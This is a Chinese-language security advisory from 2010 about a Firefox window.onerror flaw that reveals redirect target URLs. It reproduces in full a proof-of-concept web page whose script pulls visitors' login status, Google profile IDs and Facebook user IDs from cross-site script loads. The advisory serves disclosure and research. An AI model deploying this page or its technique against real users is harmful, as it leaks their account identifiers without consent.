发布日期：2010-05-27
更新日期：2010-05-28

受影响系统：

Mozilla Firefox 3.6.3
Mozilla Firefox 3.5.9

描述：

---

BUGTRAQ  ID: 40401

Firefox是非常流行的开源WEB浏览器。

Firefox的window.onerror处理器允许读取重新定向的目标URL。如果通过HTML <script>标签引用了重新定向站点的话，就可以读取目标URL中所包含的会话特定查询参数。

<*来源：Soroush Dalili （Irsdl@yahoo.com）
  
  链接：http://secunia.com/advisories/39925/
        http://soroush.secproject.com/blog/2010/05/cross-site-url-hijacking-by-using-error-object-in-mozilla-firefox/
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

XSUH (Cross Site URL Hijacking) Demo by Soroush Dalili - IRSDL at Yahoo d0t com
<br/>
Tested Platform: This technique has been tested on Mozilla Firefox 3.6.3, 3.5.9, 3.6.4build4.
<br/>
Blog: <a href="http://soroush.secproject.com/blog/">Click Here</a>
<br/>
Mirror Blog: <a href="http://irsdl1.wordpress.com">Click Here</a>
<br/><hr/>
1.    Which Version of Yahoo Mail Are You Currently Using: <b><font color="#00FF11"><span id="yahooresult"></span></font></b>
<br/>
2.    What Is Your Profile ID in Google.com: <b><font color="#7777FF"><span id="googleresult"></span></font></b>

<br/>
3.    What Is Your Facebook User ID If You Play Farmville: <b><font color="#0077FF"><span id="fbresult"></span></font></b>
<br/>
<script>
window.onerror=fnErrorTrap;
function fnErrorTrap(sMsg,sUrl,sLine){
    var msg = '';
    sUrl = unescape(sUrl);
    if(sUrl.indexOf('yahoo')>0) // Yahoo
    {
        if(sUrl.indexOf('/dc/')>0)
            msg = 'You Are Using New Version of Yahoo Mail!';
        else if(sUrl.indexOf('/mc/')>0)
            msg = 'You Are Using Old Version of Yahoo Mail!';
        else
            msg = 'You Are Not Logged-in in Yahoo Mail!';
        document.getElementById('yahooresult').innerHTML = msg;
    }
    else if(sUrl.indexOf('google')>0) //Google
    {
        if(sUrl.indexOf('/ServiceLogin')>0)
            msg = 'You Are Not Logged-in in Google.com!';
        else if(sUrl.indexOf('/editprofile')>0)
            msg = 'You Are Logged-in in Google.com But You Do Not Have Any Profile!';
        else if(sUrl.indexOf('/profiles/')>0)
            msg = 'Your Profile ID In Google.com Is: '+sUrl.substring(sUrl.lastIndexOf('/')+1);
        else
            msg = 'You Are Logged-in in Google But I Cannot Find Your Profile ID!!!';
        document.getElementById('googleresult').innerHTML = msg;
    }else // Facebook
    {
        if(sUrl.indexOf('login.php')>0)
            msg = 'You Are Not Logged-in in Facebook!';
        else if(sUrl.indexOf('tos.php')>0)
            msg = 'WoW! You Do Not Play Farmville?!!';
        else if(sUrl.indexOf('xd_receiver.htm')>0)
        {
            var temp = sUrl.substring(sUrl.indexOf('uid":'));
            msg = 'Your Facebook User ID Is: '+temp.substring(5,temp.indexOf(','));
        }
        else
            msg = 'I Cannot Get The Point!';
        document.getElementById('fbresult').innerHTML = msg;
    }
    return false;
}
if(!(/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent)))
    alert('Please use Mozilla Firefox');
else
{
    document.write('<script src="http://mail.yahoo.com/"><\/script>');
    document.write('<script src="http://www.google.com/profiles/me"><\/script>');
    document.write('<script src="http://www.facebook.com/login.php?return_session=1&nochrome=1&fbconnect=1&extern=2&display=popup&api_key=80c6ec6628efd9a465dd223190a65bbc&v=1.0&next=http://www.farmville.com/xd_receiver.htm"><\/script>');
}
</script>

建议：

---

厂商补丁：

Mozilla
-------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.mozilla.org/

浏览次数：2086
严重程度：0（网友投票）